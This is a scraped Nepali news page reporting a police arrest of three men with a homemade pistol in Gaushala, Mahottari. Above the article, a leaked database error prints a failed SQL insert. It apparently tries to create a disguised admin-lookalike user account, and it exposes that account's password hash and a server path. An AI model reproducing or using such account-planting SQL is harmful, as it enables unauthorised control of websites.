WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZ3lIcvdR4RxE0J6KHlTm7pmJUiHx/1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 12:12:42', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
नलकटुवासहित तीनजना पक्राउ – Gaule Khabar

नलकटुवासहित तीनजना पक्राउ

नलकटुवासहित तीनजना पक्राउ

गौशाला, पुस ८ –

महोत्तरी जिल्लाको गौशाला नगरपालिका–९ मा गएराति प्रहरीले नलकटुवा पेस्तोलसहित तीनजनालाई पक्राउ गरेको छ । पक्राउ पर्नेमा जिल्लाको गौशाला नगरपालिका–९ बस्ने गुदर महतो, रामकेवल महतो र वडा नम्बर १० बस्ने राजेन्द्र साह रहेको प्रहरी उपरीक्षक नलप्रसाद उपाध्यायले बताउनुभयो ।

गौशाला–९ स्थितमा गुदर महतोले आफैँ सञ्चालन गर्दै आएको कुखुरा फार्ममा अवैध हतियार लुकाइराखेको गोप्य सूचनाका आधारमा गएराति करिब ८ बजे इलाका प्रहरी कार्यालय गौशालाबाट प्रहरी निरीक्षक शम्भु पोखरेलको नेतृत्वमा खटिगएको प्रहरी टोलीले कुखुरा फार्मबाटै तीनै जनालाई हतियारसहित पक्राउ गरेको प्रहरी उपरीक्षक उपाध्यायले बताउनुभयो ।

तीनै जनाले कुखुरा फार्ममा प्लास्टिकको झोलामा बेरेर जमिनमा सुख्खा माटोले छोपेर एक थान नलकटुवा पेस्तोल लुकाइराखेको अवस्थामा उनीहरुलाई पक्राउ गरिएको प्रहरी निरीक्षक शम्भु पोखरेलले बताउनुभयो ।

नलकटुवासहित पक्राउ परेका तीनै जनालाई आवश्यक अनुसन्धानका लागि जिल्ला प्रहरी कार्यालय महोत्तरीमा ल्याउने तयारी भइरहको प्रहरी निरीक्षक पोखरेलले बताउनुभयो । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका